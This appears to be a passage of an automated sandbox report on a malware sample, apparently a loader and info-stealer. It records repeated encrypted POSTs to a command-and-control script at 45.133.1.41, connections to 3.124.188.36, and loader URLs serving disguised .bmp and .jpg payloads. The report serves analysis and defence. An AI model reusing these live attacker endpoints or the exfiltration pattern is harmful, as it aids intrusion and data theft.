                Source: global trafficHTTP traffic detected: POST /jah/inc/9f3d37faadd0a5.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 45.133.1.41Content-Length: 580Expect: 100-continueConnection: Keep-AliveData Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d 53 76 30 31 58 41 52 48 4a 4a 5a 4f 4a 71 61 66 73 44 2f 42 6b 6d 4c 79 79 4f 78 55 36 56 57 42 41 36 6d 6e 33 45 34 38 32 32 67 70 74 5a 42 53 65 4f 79 6a 6a 30 4a 71 77 30 6b 5a 7a 5a 79 49 50 36 79 65 43 47 76 25 32 42 78 4a 78 38 4f 7a 43 79 75 56 50 4c 63 49 41 39 34 4c 68 79 78 64 73 39 25 32 42 6e 35 62 53 33 51 4f 63 77 4b 55 76 70 74 57 4a 48 66 56 6a 5a 75 76 57 46 4b 25 32 42 4f 44 6d 39 79 4a 76 58 61 68 79 33 6a 50 6b 4f 42 6b 78 31 34 6a 32 35 42 49 6e 32 68 65 30 65 63 6e 74 50 71 50 6b 6d 59 30 4b 31 65 45 41 78 34 31 4b 41 41 4e 38 76 44 38 65 4a 72 56 30 58 66 73 6d 79 53 70 6d 46 6e 4a 52 75 58 33 36 67 6c 42 41 4f 59 6f 77 6f 4c 77 79 79 44 65 66 51 63 58 32 67 51 6b 32 2f 70 7a 7a 2f 32 4c 72 4f 61 37 65 50 48 34 6f 2f 71 64 4e 7a 76 58 71 7a 72 64 79 42 7a 57 6b 34 31 47 53 44 77 7a 33 71 70 79 38 6a 39 52 6b 64 57 4f 4b 43 61 4f 75 75 2f 32 65 31 73 35 41 34 37 79 77 53 31 2f 6a 6b 42 66 56 52 51 52 4b 77 3d 3d Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiMSv01XARHJJZOJqafsD/BkmLyyOxU6VWBA6mn3E4822gptZBSeOyjj0Jqw0kZzZyIP6yeCGv%2BxJx8OzCyuVPLcIA94Lhyxds9%2Bn5bS3QOcwKUvptWJHfVjZuvWFK%2BODm9yJvXahy3jPkOBkx14j25BIn2he0ecntPqPkmY0K1eEAx41KAAN8vD8eJrV0XfsmySpmFnJRuX36glBAOYowoLwyyDefQcX2gQk2/pzz/2LrOa7ePH4o/qdNzvXqzrdyBzWk41GSDwz3qpy8j9RkdWOKCaOuu/2e1s5A47ywS1/jkBfVRQRKw==
                Source: global trafficHTTP traffic detected: POST /jah/inc/9f3d37faadd0a5.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 45.133.1.41Content-Length: 580Expect: 100-continueConnection: Keep-AliveData Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d 53 76 30 31 58 41 52 48 4a 4a 5a 4f 4a 71 61 66 73 44 2f 42 6b 6d 4c 79 79 4f 78 55 36 56 57 42 41 36 6d 6e 33 45 34 38 32 32 67 70 74 5a 42 53 65 4f 79 6a 6a 30 4a 71 77 30 6b 5a 7a 5a 79 49 50 36 79 65 43 47 76 25 32 42 78 4a 78 38 4f 7a 43 79 75 56 50 4c 63 49 41 39 34 4c 68 79 78 64 73 39 25 32 42 6e 35 62 53 33 51 4f 63 77 4b 55 76 70 74 57 4a 48 66 56 6a 5a 75 76 57 46 4b 25 32 42 4f 44 6d 39 79 4a 76 58 61 68 79 33 6a 50 6b 4f 42 6b 78 31 34 6a 32 35 42 49 6e 32 68 65 30 65 63 6e 74 50 71 50 6b 6d 59 30 4b 31 65 45 41 78 34 31 4b 41 41 4e 38 76 44 38 65 4a 72 56 30 58 66 73 6d 79 53 70 6d 46 6e 4a 52 75 58 33 36 67 6c 42 41 4f 59 6f 77 6f 4c 77 79 79 44 65 66 51 63 58 32 67 51 6b 32 2f 70 7a 7a 2f 32 4c 72 4f 61 37 65 50 48 34 6f 2f 71 64 4e 7a 76 58 71 7a 72 64 79 42 7a 57 6b 34 31 47 53 44 77 7a 33 71 70 79 38 6a 39 52 6b 64 57 4f 4b 43 61 4f 75 75 2f 32 65 31 73 35 41 34 37 79 77 53 31 2f 6a 6b 42 66 56 52 51 52 4b 77 3d 3d Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiMSv01XARHJJZOJqafsD/BkmLyyOxU6VWBA6mn3E4822gptZBSeOyjj0Jqw0kZzZyIP6yeCGv%2BxJx8OzCyuVPLcIA94Lhyxds9%2Bn5bS3QOcwKUvptWJHfVjZuvWFK%2BODm9yJvXahy3jPkOBkx14j25BIn2he0ecntPqPkmY0K1eEAx41KAAN8vD8eJrV0XfsmySpmFnJRuX36glBAOYowoLwyyDefQcX2gQk2/pzz/2LrOa7ePH4o/qdNzvXqzrdyBzWk41GSDwz3qpy8j9RkdWOKCaOuu/2e1s5A47ywS1/jkBfVRQRKw==
                Source: global trafficHTTP traffic detected: POST /jah/inc/9f3d37faadd0a5.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 45.133.1.41Content-Length: 580Expect: 100-continueConnection: Keep-AliveData Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiM
                Source: global trafficHTTP traffic detected: POST /jah/inc/9f3d37faadd0a5.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 45.133.1.41Content-Length: 580Expect: 100-continueConnection: Keep-AliveData Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiM
                Source: global trafficHTTP traffic detected: POST /jah/inc/9f3d37faadd0a5.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 45.133.1.41Content-Length: 580Expect: 100-continueConnection: Keep-AliveData Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d 53 76 30 31 58 41 52 48 4a 4a 5a 4f 4a 71 61 66 73 44 2f 42 6b 6d 4c 79 79 4f 78 55 36 56 57 42 41 36 6d 6e 33 45 34 38 32 32 67 70 74 5a 42 53 65 4f 79 6a 6a 30 4a 71 77 30 6b 5a 7a 5a 79 49 50 36 79 65 43 47 76 25 32 42 78 4a 78 38 4f 7a 43 79 75 56 50 4c 63 49 41 39 34 4c 68 79 78 64 73 39 25 32 42 6e 35 62 53 33 51 4f 63 77 4b 55 76 70 74 57 4a 48 66 56 6a 5a 75 76 57 46 4b 25 32 42 4f 44 6d 39 79 4a 76 58 61 68 79 33 6a 50 6b 4f 42 6b 78 31 34 6a 32 35 42 49 6e 32 68 65 30 65 63 6e 74 50 71 50 6b 6d 59 30 4b 31 65 45 41 78 34 31 4b 41 41 4e 38 76 44 38 65 4a 72 56 30 58 66 73 6d 79 53 70 6d 46 6e 4a 52 75 58 33 36 67 6c 42 41 4f 59 6f 77 6f 4c 77 79 79 44 65 66 51 63 58 32 67 51 6b 32 2f 70 7a 7a 2f 32 4c 72 4f 61 37 65 50 48 34 6f 2f 71 64 4e 7a 76 58 71 7a 72 64 79 42 7a 57 6b 34 31 47 53 44 77 7a 33 71 70 79 38 6a 39 52 6b 64 57 4f 4b 43 61 4f 75 75 2f 32 65 31 73 35 41 34 37 79 77 53 31 2f 6a 6b 42 66 56 52 51 52 4b 77 3d 3d Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiMSv01XARHJJZOJqafsD/BkmLyyOxU6VWBA6mn3E4822gptZBSeOyjj0Jqw0kZzZyIP6yeCGv%2BxJx8OzCyuVPLcIA94Lhyxds9%2Bn5bS3QOcwKUvptWJHfVjZuvWFK%2BODm9yJvXahy3jPkOBkx14j25BIn2he0ecntPqPkmY0K1eEAx41KAAN8vD8eJrV0XfsmySpmFnJRuX36glBAOYowoLwyyDefQcX2gQk2/pzz/2LrOa7ePH4o/qdNzvXqzrdyBzWk41GSDwz3qpy8j9RkdWOKCaOuu/2e1s5A47ywS1/jkBfVRQRKw==
                Source: global trafficHTTP traffic detected: POST /jah/inc/9f3d37faadd0a5.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 45.133.1.41Content-Length: 580Expect: 100-continueConnection: Keep-AliveData Raw: 70 3d 67 45 66 71 7a 66 76 48 36 51 41 68 59 38 6b 36 39 49 45 48 38 61 4a 39 61 46 32 6c 74 73 73 33 72 78 4a 4a 33 65 64 74 4b 66 77 25 32 42 71 52 69 47 63 30 42 6c 4c 74 69 4c 36 50 4e 6b 46 63 57 6b 56 33 38 41 42 48 66 44 5a 51 4b 45 49 42 6e 53 63 4e 32 37 76 48 6d 69 41 2f 48 59 75 61 39 72 57 42 44 70 66 31 72 70 76 58 4e 43 7a 71 53 36 63 6f 4a 59 38 70 53 25 32 42 77 78 48 4d 32 69 68 47 6a 4f 7a 57 4b 4d 75 6e 76 72 4c 61 36 52 78 37 41 68 43 63 35 68 64 31 32 75 31 4b 30 61 6b 53 59 50 62 37 57 79 78 4e 69 65 78 59 49 78 63 45 54 43 47 56 2f 37 6e 65 55 53 45 4a 48 6d 75 4f 76 67 7a 68 47 70 4c 32 66 51 45 6f 5a 5a 66 47 5a 2f 2f 34 73 61 4f 64 58 36 50 36 58 32 73 64 57 36 56 6a 38 49 4e 69 4e 6d 63 5a 53 5a 6b 5a 33 57 79 48 30 6e 6d 42 47 68 4a 72 75 75 66 53 69 4d 53 76 30 31 58 41 52 48 4a 4a 5a 4f 4a 71 61 66 73 44 2f 42 6b 6d 4c 79 79 4f 78 55 36 56 57 42 41 36 6d 6e 33 45 34 38 32 32 67 70 74 5a 42 53 65 4f 79 6a 6a 30 4a 71 77 30 6b 5a 7a 5a 79 49 50 36 79 65 43 47 76 25 32 42 78 4a 78 38 4f 7a 43 79 75 56 50 4c 63 49 41 39 34 4c 68 79 78 64 73 39 25 32 42 6e 35 62 53 33 51 4f 63 77 4b 55 76 70 74 57 4a 48 66 56 6a 5a 75 76 57 46 4b 25 32 42 4f 44 6d 39 79 4a 76 58 61 68 79 33 6a 50 6b 4f 42 6b 78 31 34 6a 32 35 42 49 6e 32 68 65 30 65 63 6e 74 50 71 50 6b 6d 59 30 4b 31 65 45 41 78 34 31 4b 41 41 4e 38 76 44 38 65 4a 72 56 30 58 66 73 6d 79 53 70 6d 46 6e 4a 52 75 58 33 36 67 6c 42 41 4f 59 6f 77 6f 4c 77 79 79 44 65 66 51 63 58 32 67 51 6b 32 2f 70 7a 7a 2f 32 4c 72 4f 61 37 65 50 48 34 6f 2f 71 64 4e 7a 76 58 71 7a 72 64 79 42 7a 57 6b 34 31 47 53 44 77 7a 33 71 70 79 38 6a 39 52 6b 64 57 4f 4b 43 61 4f 75 75 2f 32 65 31 73 35 41 34 37 79 77 53 31 2f 6a 6b 42 66 56 52 51 52 4b 77 3d 3d Data Ascii: p=gEfqzfvH6QAhY8k69IEH8aJ9aF2ltss3rxJJ3edtKfw%2BqRiGc0BlLtiL6PNkFcWkV38ABHfDZQKEIBnScN27vHmiA/HYua9rWBDpf1rpvXNCzqS6coJY8pS%2BwxHM2ihGjOzWKMunvrLa6Rx7AhCc5hd12u1K0akSYPb7WyxNiexYIxcETCGV/7neUSEJHmuOvgzhGpL2fQEoZZfGZ//4saOdX6P6X2sdW6Vj8INiNmcZSZkZ3WyH0nmBGhJruufSiMSv01XARHJJZOJqafsD/BkmLyyOxU6VWBA6mn3E4822gptZBSeOyjj0Jqw0kZzZyIP6yeCGv%2BxJx8OzCyuVPLcIA94Lhyxds9%2Bn5bS3QOcwKUvptWJHfVjZuvWFK%2BODm9yJvXahy3jPkOBkx14j25BIn2he0ecntPqPkmY0K1eEAx41KAAN8vD8eJrV0XfsmySpmFnJRuX36glBAOYowoLwyyDefQcX2gQk2/pzz/2LrOa7ePH4o/qdNzvXqzrdyBzWk41GSDwz3qpy8j9RkdWOKCaOuu/2e1s5A47ywS1/jkBfVRQRKw==
                Source: global trafficHTTP traffic detected: POST /jah/inc/9f3d37faadd0a5.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 45.133.1.41Content-Length: 580Expect: 100-continueConnection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: unknownTCP traffic detected without corresponding DNS query: 3.124.188.36
                Source: InstallUtil.exe, 0000000E.00000002.490929269.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: TM57812337.exe, 00000000.00000002.359956017.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475551325.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489449039.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507761742.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.124.188.36
                Source: Qjarsxlh.exe, Qjarsxlh.exe, 00000010.00000002.507761742.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.124.188.36/bay/loader/uploads/TM57812337_Nbfpwrzt.bmp
                Source: TM57812337.exe, 00000000.00000002.359393635.0000000000112000.00000002.00000001.01000000.00000003.sdmp, Qjarsxlh.exe, 0000000F.00000002.482637947.0000000000E82000.00000002.00000001.01000000.00000009.sdmp, Qjarsxlh.exe, 00000010.00000002.506852615.00000000006D2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://3.124.188.36/bay/loader/uploads/TM57812337_Nbfpwrzt.bmp5Khtha.Properties.Resources
                Source: Qqsucntzxgqwkiqkvrafiufflip.exe, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475551325.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.124.188.36/bay/loader/uploads/flip_Jozgxzue.jpg
                Source: Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000000.336203472.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.474926628.0000000001145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.124.188.36/bay/loader/uploads/flip_Jozgxzue.jpg7Eiipbn.Properties.Resources
                Source: InstallUtil.exe, 0000000E.00000002.492252394.000000000324E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.41
                Source: InstallUtil.exe, 0000000E.00000003.429581802.00000000014AB000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.492252394.000000000324E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.41/jah/inc/9f3d37faadd0a5.php
                Source: InstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.41/jah/inc/9f3d37faadd0a5.php127.0.0.1POST
                Source: InstallUtil.exe, 0000000E.00000003.450778091.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.490445917.0000000001499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.41/jah/inc/9f3d37faadd0a5.phpS
                Source: InstallUtil.exe, 0000000E.00000002.492252394.000000000324E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.414
                Source: InstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: InstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://YHHdpI.com
                Source: InstallUtil.exe, 0000000E.00000003.462904984.00000000063E0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.485650023.00000000063E0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.487971745.00000000063E0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.495084891.00000000063E0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.450730842.00000000063E0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.462615950.00000000063E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctl133.1.41/jah/inc/9f3d37faadd0a5.php
                Source: TM57812337.exe, 00000000.00000002.359956017.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475551325.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.492252394.000000000324E000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489449039.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507761742.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: InstallUtil.exe, 0000000E.00000003.429515499.00000000063B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.429433216.00000000063A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.450686331.00000000063B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                Source: InstallUtil.exe, 00000021.00000002.535075239.0000000006380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wwwrosoft.com/pkiops/crl/MicCod
                Source: InstallUtil.exe, 0000000E.00000002.490929269.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
